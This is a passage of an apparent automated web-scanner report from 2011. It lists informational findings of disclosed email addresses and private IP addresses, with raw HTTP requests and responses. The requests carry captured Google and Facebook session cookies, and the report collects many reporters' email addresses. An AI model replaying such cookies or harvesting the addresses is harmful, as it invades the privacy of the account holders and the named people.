GET /cim/script/cim_v92_cim_11_12_4.en.js?1313001210 HTTP/1.1
Host: s.meebocdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: "932352005"
Last-Modified: Thu, 04 Aug 2011 21:29:39 GMT
Server: lighttpd/1.4.19
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=140427
Expires: Mon, 05 Sep 2011 16:10:51 GMT
Date: Sun, 04 Sep 2011 01:10:24 GMT
Content-Length: 257295
Connection: close

// Copyright 2005-2010 Meebo, inc.
//
// RSA javascript implementation Copyright 1998-2005 David Shapiro
// please see http://www.ohdave.com/rsa/
// SHA256 javascript implementation Copyright 2003-200
...[SNIP]...
<a href="mailto:ad-feedback@meebo-inc.com?subject='+
encodeURIComponent("Comment about: "+this.m_ad.getProp("share"))+
'" class="meebo-0 meebo-291">
...[SNIP]...

21.5. http://www.google.com/uds/Gfeeds

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /uds/Gfeeds

Issue detail

The following email address was disclosed in the response:

Request

GET /uds/Gfeeds?callback=google.feeds.Feed.RawCompletion&context=0&num=15&hl=en&output=xml&q=http%3A%2F%2Fsacramentoconnect.sacbee.com%2F%3Ffeed%3Dsc%26category_name%3Dpolitics&scoring=h&key=notsupplied&v=1.0&nocache=1315097363266 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; S=izeitgeist-ad-metrics=t0E3hsRy46s

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Sun, 04 Sep 2011 00:48:48 GMT
Content-Type: text/javascript; charset=utf-8
X-Backend-Content-Length: 35065
X-Embedded-Status: 200
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 41169

google.feeds.Feed.RawCompletion('0', {"xmlString":"\u003c?xml version\u003d\"1.0\" encoding\u003d\"UTF-8\"?\u003e\r\n\u003cfeed xmlns\u003d\"http://www.w3.org/2005/Atom\" xmlns:dc\u003d\"http://purl.o
...[SNIP]...
7e0b8612a35e9537a3026d4\u003c/id\u003e\u003csummary type\u003d\"html\"\u003eEach week, Louis Dettorre will provide the PublicCEO Staff Report of the Week. Nominate yourself or a colleague by e-mailing ldettorre@publicCEO.com This e-mail address is being protected from spambots. You need JavaScript enabled to view it. (Editor'...\u003c/summary\u003e\u003csource\u003e\u003ctitle type\u003d\"text\"\u003eHome\u003c/title\u003
...[SNIP]...

21.6. http://www.google.com/uds/Gfeeds

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /uds/Gfeeds

Issue detail

The following email addresses were disclosed in the response:

Request

GET /uds/Gfeeds?callback=google.feeds.Feed.RawCompletion&context=3&num=15&hl=en&output=xml&q=http%3A%2F%2Fwww.sacbee.com%2Ftopstories%2Findex.rss&scoring=h&key=notsupplied&v=1.0&nocache=1315097363269 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; S=izeitgeist-ad-metrics=t0E3hsRy46s

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Sun, 04 Sep 2011 00:48:48 GMT
Content-Type: text/javascript; charset=utf-8
X-Backend-Content-Length: 52278
X-Embedded-Status: 200
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 46411

google.feeds.Feed.RawCompletion('3', {"xmlString":"\u003c?xml version\u003d\"1.0\" encoding\u003d\"UTF-8\"?\u003e\r\n\u003crss xmlns:dc\u003d\"http://purl.org/dc/elements/1.1/\" xmlns:atom\u003d\"http
...[SNIP]...
gt; This pet python received stitches and lost a couple of ribs after allegedly being bitten by a man. The snake was recovering Friday.\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003ewmountain@sacbee.com (Whitney Mountain)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://blogs.sacbee.com/crime/archives/2011/09/python-bit-by-s.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003ewmountain@sacbee.com (Whitney Mountain)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 15:21:46 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 15:21:46 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003c
...[SNIP]...
from Princeton, CA near Redding, to Sacramento\u0026#39;s Tower Bridge, a distance of approximately 111 miles.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Randall Benton/rbenton@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Sacramento Bee\u003c/sb:credit\u003e\u003cdescription\u003eToday is the second Spare the Air Day this summer, meaning
...[SNIP]...
1. Patrick was attempting to swim from Princeton, CA near Redding, to Sacramento's Tower Bridge, a distance of approximately 111 miles.\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003ewmountain@sacbee.com (Whitney Mountain)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3882645/like-your-labor-day-weekend-hot.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003ewmountain@sacbee.com (Whitney Mountain)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 12:33:35 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 12:33:35 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003c
...[SNIP]...
e firm keeps in stock at its Gold River facility. The firm specializes in used, recent-model imports.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Ren\u0026#xE9;e C. Byer/rbyer@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Sacramento Bee\u003c/sb:credit\u003e\u003cdescription\u003eA slice of the Internet's effect on contemporary car selli
...[SNIP]...
some of the more than 100 cars the firm keeps in stock at its Gold River facility. The firm specializes in used, recent-model imports.\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003emglover@sacbee.com (Mark Glover)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3881518/internet-drives-capital-car-dealer.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003emglover@sacbee.com (Mark Glover)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 11:05:09 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 11:05:09 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003citem\
...[SNIP]...
k Austin Perry bursts through a hole during the Falcons' victory over Bradshaw Christian as part of the Smackdown in Sactown showcase. \u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003ejdavidson@sacbee.com (Joe Davidson)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3882093/preps-fdsfydsfysd-fdysfsdy.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003ejdavidson@sacbee.com (Joe Davidson)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 17:18:01 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 17:18:01 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003citem
...[SNIP]...
e\u003c![CDATA[Dennis Stark of Atlas Tree Service jumps from a grinder at the Putah Creek restoration site.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Paul Kitagaki Jr./pkitagaki@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003cmedia:content url\u003d\"http://media.sacbee.com/smedia/2011/09/02/21/53/Uo4ay.St.4.jpg\" height\u003d\"490\" width\u003d\"640\" type\u0
...[SNIP]...
\"\u003e\u003c![CDATA[Rich Marovich and Libby Earthman stand along a section of Putah Creek being restored.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Paul Kitagaki Jr./pkitagaki@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Sacramento Bee\u003c/sb:credit\u003e\u003cdescription\u003eThere was a time when Putah Creek ran wild near Winters, w
...[SNIP]...
0026gt;\u0026lt;/a\u0026gt; \u0026lt;br/\u0026gt; Rich Marovich and Libby Earthman stand along a section of Putah Creek being restored.\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003ehsangree@sacbee.com (Hudson Sangree)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3882044/winters-project-restoring-putah.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003ehsangree@sacbee.com (Hudson Sangree)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 15:23:32 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 15:23:32 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003cit
...[SNIP]...
artment granted a key victory Friday to a Butte County tribe that has been long frustrated in its effort to build a $150 million casino resort in rural Yuba County.\u003c/description\u003e\u003cauthor\u003ephecht@sacbee.com (Peter Hecht)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3881952/tribes-bid-for-yuba-county-casino.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003ephecht@sacbee.com (Peter Hecht)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 00:00:00 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 00:00:00 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003citem\
...[SNIP]...
ates in a downtown Sacramento march against fee hikes and in support of the Dream Act on Monday, Fe. 28, 2011.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Hector Amezcua/hamezcua@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Sacramento Bee\u003c/sb:credit\u003e\u003cdescription\u003eThe state Assembly voted Friday to send Gov. Jerry Brown a
...[SNIP]...
C Irvine student participates in a downtown Sacramento march against fee hikes and in support of the Dream Act on Monday, Fe. 28, 2011.\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003elrosenhall@sacbee.com (Laurel Rosenhall)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3881709/lawmakers-send-brown-bill-granting.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003elrosenhall@sacbee.com (Laurel Rosenhall)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 09:40:28 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 09:40:28 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003c
...[SNIP]...
26#39;s 70 positions at a new facility that is opening on Sept. 20 at 10317 Fairway Drive, Roseville.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Ren\u0026#x8E;e C. Byer/rbyer@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Sacramento Bee\u003c/sb:credit\u003e\u003cdescription\u003eMore payroll tax cuts. A break for manufacturers. Less red
...[SNIP]...
Krispy Kreme held a job fair to fill it's 70 positions at a new facility that is opening on Sept. 20 at 10317 Fairway Drive, Roseville.\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003edkasler@sacbee.com (Dale Kasler)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3882042/grim-report-sharpens-focus-on.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003edkasler@sacbee.com (Dale Kasler)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 00:00:00 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 00:00:00 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003citem\
...[SNIP]...
care for his father in his final days. Many of the tools are antiques, bought in flea markets and other spots.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Randall Benton/rbenton@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003cmedia:content url\u003d\"http://media.sacbee.com/smedia/2011/09/02/21/18/1dKhKf.St.4.jpg\" height\u003d\"425\" width\u003d\"640\" type\u
...[SNIP]...
u003d\"180\" /\u003e\u003cmedia:description type\u003d\"html\"\u003e\u003c![CDATA[Ear marker for small animals]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Randall Benton/rbenton@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003cmedia:content url\u003d\"http://media.sacbee.com/smedia/2011/09/02/21/18/QPo7D.St.4.jpg\" height\u003d\"425\" width\u003d\"640\" type\u0
...[SNIP]...
u003d\"180\" /\u003e\u003cmedia:description type\u003d\"html\"\u003e\u003c![CDATA[A bin full of old hand tools]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Randall Benton/rbenton@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003cmedia:content url\u003d\"http://media.sacbee.com/smedia/2011/09/02/21/18/qie75.St.4.jpg\" height\u003d\"700\" width\u003d\"465\" type\u0
...[SNIP]...
270\" width\u003d\"180\" /\u003e\u003cmedia:description type\u003d\"html\"\u003e\u003c![CDATA[Old loom shuttle]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Randall Benton/rbenton@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Sacramento Bee\u003c/sb:credit\u003e\u003cdescription\u003eTo hear his son tell it, Raymond Schneider's garage was ju
...[SNIP]...
i.4.jpg\" height\u003d\"270\" width\u003d\"180\" border\u003d\"0\"/\u0026gt;\u0026lt;/a\u0026gt; \u0026lt;br/\u0026gt; Old loom shuttle\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003ecalcala@sacbee.com (Carlos Alcal\u0026amp;#xE1;)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3881950/antique-tool-collection-to-go.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003ecalcala@sacbee.com (Carlos Alcal\u0026amp;#xE1;)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 00:00:00 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 00:00:00 PDT\u003c/pubDate\u003e\u003c/item\
...[SNIP]...
ts in privacy. To right of Steinberg are UFW President Arturo Rodriguez and Assemblyman Luis Alejo, D-Salinas.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Hector Amezcua/hamezcua@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Sacramento Bee\u003c/sb:credit\u003e\u003cdescription\u003eEven before the United Farm Workers union started marching
...[SNIP]...
ll out state-issued ballots in privacy. To right of Steinberg are UFW President Arturo Rodriguez and Assemblyman Luis Alejo, D-Salinas.\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003edsiders@sacbee.com (David Siders)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3882041/ufw-jerry-brown-meet-in-the-middle.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003edsiders@sacbee.com (David Siders)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 10:19:07 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 10:19:07 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003citem
...[SNIP]...
6quot; to redirect the propane into a pond, they had to reignite the blaze to allow it to burn in place again.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[RANDALL BENTON/rbenton@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Sacramento Bee\u003c/sb:credit\u003e\u003cdescription\u003eA calm, take-charge dispatcher, quick action by firefighte
...[SNIP]...
pite plans to use a \"hot tap\" to redirect the propane into a pond, they had to reignite the blaze to allow it to burn in place again.\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003eclocke@sacbee.com (Cathy Locke)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3881949/quick-response-to-lincoln-rail.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003eclocke@sacbee.com (Cathy Locke)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 14:52:36 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 14:52:36 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003citem\
...[SNIP]...
/media.sacbee.com/smedia/2011/09/02/23/33/16Mm8c.Hi.4.jpg\" height\u003d\"121\" width\u003d\"180\" /\u003e\u003cmedia:description type\u003d\"html\"\u003e\u003c![CDATA[Jos\u0026amp;#xE9; Luis Villegas jvillegas@sacbee.com Highlands quarterback Kurtis Stamm is sacked by defenders from Leland of San Jose in the second quarter of their Battle at the Capital game at Del Oro High School in Loomis. The game was still in prog
...[SNIP]...
shaw Christian High School in the Smackdown in Sactown Football Classic at Grant High School, Friday Sept 2, 2011.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Brian Baer/sabeephotos@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003cdescription\u003eResults are coming in to our updating scoreboard page. See scores from Smackdown in Sactown and the other local action.
...[SNIP]...
media.sacbee.com/smedia/2011/09/02/23/33/16Mm8c.Hi.4.jpg\" height\u003d\"121\" width\u003d\"180\" border\u003d\"0\"/\u0026gt;\u0026lt;/a\u0026gt; \u0026lt;br/\u0026gt; Jos\u0026amp;#xE9; Luis Villegas jvillegas@sacbee.com Highlands quarterback Kurtis Stamm is sacked by defenders from Leland of San Jose in the second quarter of their Battle at the Capital game at Del Oro High School in Loomis. The game was still in prog
...[SNIP]...
ouse at the Thunderbird Lodge Historic Site. The 55 foot commuter yacht was launched July 14th 1940. May 29, 2010]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Autumn Cruz/acruz@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003cmedia:content url\u003d\"http://media.sacbee.com/smedia/2011/08/31/18/03/15VAsp.St.4.jpg\" height\u003d\"476\" width\u003d\"640\" type\u
...[SNIP]...
lthy George Whittell in 1936 on the east shore of Lake Tahoe. Tours are now available to the public. May 29, 2010]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Autumn Cruz/acruz@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Associated Press\u003c/sb:credit\u003e\u003cdescription\u003eThe pilot who safely landed a disabled airliner in New Y
...[SNIP]...
estigators want to move the car to a spot where they can closely examine it and may also conduct more interviews.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[RANDY PENCH/rpench@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Sacramento Bee\u003c/sb:credit\u003e\u003cdescription\u003eLincoln fire and police officials credit the quick work of
...[SNIP]...
oad Administration investigators want to move the car to a spot where they can closely examine it and may also conduct more interviews.\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003eclocke@sacbee.com (Cathy Locke)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://blogs.sacbee.com/crime/archives/2011/09/lincoln-officia.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003eclocke@sacbee.com (Cathy Locke)\u003c/dc:creator\u003e\u003cdc:date\u003eFri, 02 Sep 2011 17:36:21 PDT\u003c/dc:date\u003e\u003cpubDate\u003eFri, 02 Sep 2011 17:36:21 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003catom:
...[SNIP]...

21.7. http://www.personalcreations.com/CustomerService-ContactUs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /CustomerService-ContactUs.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /CustomerService-ContactUs.aspx HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:18:54 GMT
Connection: close
Content-Length: 98295

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<a href="mailto:wecare@customercare.personalcreations.com">wecare@customercare.personalcreations.com</a>
...[SNIP]...
<a href="mailto:pr@providecommerce.com">pr@providecommerce.com</a>
...[SNIP]...
<a href="mailto:affiliatesupport@personalcreations.com">affiliatesupport@personalcreations.com</a>
...[SNIP]...

21.8. http://www.sacbee.com/notfound/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /notfound/

Issue detail

The following email address was disclosed in the response:

Request

GET /notfound/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Proxy-Connection: Keep-Alive
Host: www.sacbee.com

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 56279
Expires: Sun, 04 Sep 2011 00:58:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:58:25 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...

22. Private IP addresses disclosed
There are 5 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


22.1. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=169549326390879&app_id=169549326390879&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df15d33f88%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff26b97bc4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17c6a8bf%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff26b97bc4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df829f9104%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df167d67864%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff26b97bc4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df829f9104&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31fa05874%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff26b97bc4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df829f9104&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c39a6048%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff26b97bc4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df829f9104&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/assets/commentsChild?canonical_article_id=/article/2011/09/04/us-weather-football-idUSTRE78222D20110904&articleId=USTRE78222D20110904&headline=Notre+Dame%2C+Michigan+stadiums+cleared+due+to+storms&channel=domesticNews&edition=BETAUS&view=base
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.160.62
X-Cnection: close
Date: Sun, 04 Sep 2011 01:01:25 GMT
Content-Length: 240

<script type="text/javascript">
parent.postMessage("cb=f31fa05874&origin=http\u00253A\u00252F\u00252Fwww.reuters.com\u00252Ff26b97bc4&relation=parent&transport=postmessage&frame=f829f9104", "http:\/\/
...[SNIP]...

22.2. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

